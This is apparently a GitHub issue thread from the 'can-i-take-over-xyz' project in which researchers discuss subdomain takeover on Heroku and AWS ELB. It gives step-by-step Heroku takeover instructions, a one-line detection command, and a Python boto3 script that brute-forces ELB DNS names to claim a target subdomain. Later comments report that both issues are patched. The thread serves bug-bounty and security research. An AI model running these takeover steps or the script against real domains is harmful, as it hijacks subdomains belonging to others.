can-i-take-over-xyz
can-i-take-over-xyz copied to clipboard
EdOverflow
Heroku proofs
Service name
Heroku
Proof
Heroku has same virtual hosting concept as other cloud providers. Various *.herokudns.com subdomain respond with the same set of A records. HTTP Host matters for correct domain resolution (as in other providers). There is also an possibility to upload own certificate in order to work on custom domain as well (e.g. GitHub Pages doesn't support this and thus you cannot have HTTPS enabled with custom domain set).
Step-by-step:
- Open new Heroku app.
- Choose name and region (no effect on takeover).
- Push PoC application using git to Heroku. The process is described in Deploy tab.
- Switch to Settings tab.
- Scroll to Domains and certificates.
- Click Add domain.
- Provide the domain name you want to takeover, click Save changes.
- It might take some time for settings to propagate.
To verify:
http -b GET http://{DOMAIN NAME} | grep -F -q "//www.herokucdn.com/error-pages/no-such-app.html" && echo "Subdomain takeover may be possible" || echo "Subdomain takeover is not possible"
(there is an iFrame with aforementioned URL present)
Documentation
There are three domains that Heroku uses:
- *.herokudns.com
- *.herokuapp.com
- *.herokussl.com
At the moment, I can confirm only proper working on herokudns.com. IIRC, herokuapp.com is a domain that was used prior and is now deprecated, however old DNS records still work. I would like to hear more in comments from somebody who has experience with the remaining two.
Official Heroku docs: https://devcenter.heroku.com/articles/custom-domains
Can someone clarify with *.herokudns.com right now? When I add a custom domain the DNS record is fully randomized. Something like larval-beet.y987yas98yd98ya9yhd.herokudns.com It used to be www.domain.com.herokudns.com like 2 days ago @PatrikHudak @EdOverflow
@dropocol Thanks a lot for the clarification. I was soo lucky to do a takeover two days. Just found another one and BAM! they have put mitigations. Good move by Heroku anyway.
@mshassy Correct me if I am wrong but this means that the domain takeovers aren't possible any more?
@dropocol Technically you still can. If the domain admin decides to use *.herokuapp.com which is not randomized yet. But both *.herokudns.com and *.herokussl.com are not vulnerable.
@mshassy What's the extent of this randomisation? These can often be defeated with a python script if the randomisation is somewhat predictable / basic (Amazon ELB's being a good example of this).
@codingo oncave-bastion-olhqn7oqox74kixnwxpsyxkv.herokudns.com introductory-chimpanzee-vpgvjaxri1ntnuoda6f03jqy.herokudns.com fundamental-meerkat-dzdijagwzkou8z2ansfnmpsk.herokudns.com
3 back to back instances where I tried to add the same domain. Now it's fully randomized as you can see. I'm not sure whether it's possible to brute force such.
But it's strange that there is no info in their documentation about such change. https://devcenter.heroku.com/articles/custom-domains https://help.heroku.com/VKRNVVF5/what-is-the-correct-dns-cname-target-for-my-custom-domains
Btw this is off topic but I would be glad if you could tell us more about the ELB brute forcing. Does it mean that ELB takeovers are possible? I'm not too sure about this statement.
The change was activated on the 16th of October and recorded in the Heroku changelog: https://devcenter.heroku.com/changelog-items/1488
The devcenter documentation has not been updated yet, but should be before too long.
If the company uses wild card ".domain.com then you cannot take it over because they "claim" all subdomains
@codingo can you please elaborate more about Amazon's ELB's cnames are appended a somewhat predictable integer? My trials with AWS's Load Balancer API seem to indicate uniformly distributed values.
@sagi these now look to be patched but for a period of time you could brute force them. Example PoC from when it was working below:
import boto3
import argparse
import time
client = boto3.client('elb', 'eu-central-1')
def takeover(elb,dns,flag):
while (flag):
time.sleep(2)
response = client.create_load_balancer(
Listeners=[
{
'InstancePort': 80,
'InstanceProtocol': 'HTTP',
'LoadBalancerPort': 80,
'Protocol': 'HTTP',
},
],
LoadBalancerName=elb,
SecurityGroups=[
'sg-ead50686',
],
Subnets=[
'subnet-e7a9559c',
],
)
print(response['DNSName'])
if response['DNSName'] == dns :
flag=0
print "DOMAIN TAKEN OVER"
exit (0)
else:
response = client.delete_load_balancer(
LoadBalancerName=elb
)
def main():
parser = argparse.ArgumentParser(description='This script is for taking over ELB-SUBDOMAINS specifically eu-central-1')
parser.add_argument('-elb', '--load_balancer', required=True)
parser.add_argument('-dns', '--domain_name', required=True)
args = parser.parse_args()
takeover(args.load_balancer, args.domain_name,1)
if __name__ == '__main__':
main()
Happy to elaborate further if you DM me on twitter.
Do you have any idea how to takeover subdomain with the following records Status : NXDOMAIN CNAME : something.herokussl.com ?
More Prove about Edge case you can find it on my blog https://www.mohamedharon.com/2019/04/herokudns-still-vulnerable.html
Herokudns is not vulnerable anymore, the mentioned edge cases are also not working.
@rootkech can you please elaborate a little why it is not vulnerable any more? Also, have you checked all the heroku domains? herokuapp.com, herokudns.com and herokussl.com
@rootkech can you please elaborate a little why it is not vulnerable any more? Also, have you checked all the heroku domains? herokuapp.com, herokudns.com and herokussl.com
You don't have the option to choose custom subdomains anymore with herokudns.com
Adding to the post^, this only works with domains and not subdomains.
-Open to corrections.
I actually was able to takeover a subdomain, and it actually works on heroku but to be able to add a custom domain or subdomain you need to verify your account first by a card(e.g., visa, master card, etc), it didn't take any money from me, i think there is a free amount per month if you exceeded it you have to pay, i think you can use the free plan until you submit your POC then you can remove your card details, but if you need to register the same card details again for another POC later on, you will need to wait for a while until you could be able to register it again.
Heroku is not vulnerable any more :(
https://devcenter.heroku.com/articles/error-codes#h31-misdirected-request
H31 - Misdirected Request The client sent a request to the wrong endpoint. This could be because the client used stale DNS information or is accessing the app through a CDN that has stale DNS information. Verify that DNS is correctly configured for your app. If a CDN is configured for the app, consider contacting your CDN provider.
It looks like *.herokuapp.com is not vulnerable anymore.
The scenario:
dig -t CNAME x.vulnerable.com
[...]
;; ANSWER SECTION:
x.vulnerable.com. 142 IN CNAME x.vulnerable.herokuapp.com.
I took over x.vulnerable.herokuapp.com. However, when navigating to x.vulnerable.com, the HTTP Host header would be set to x.vulnerable.com. Heroku would then route to request to the Application Error page. However, when sending the request with the HTTP Host header set to x.vulnerable.herokuapp.com, Heroku successfully re-routed the request to my app. Both requests were sent to x.vulnerable.com.
For this case, I believe you need to have the root domain certificate associated with *.vulnerableapp.com to make Heroku successfully route the request which the attacker would not have access to.
You can read more here in the Heroku documentation.
What is the solution next? Plz help me.
The subdomain is under herokuspace.com
https://medium.com/@neverl0gbughunt/how-i-found-subdomain-takeover-on-red-bull-57540158a18
It seems Heroku turns out Non Vulnerable for takeovers anymore
- Reference : https://devcenter.heroku.com/changelog-items/2640
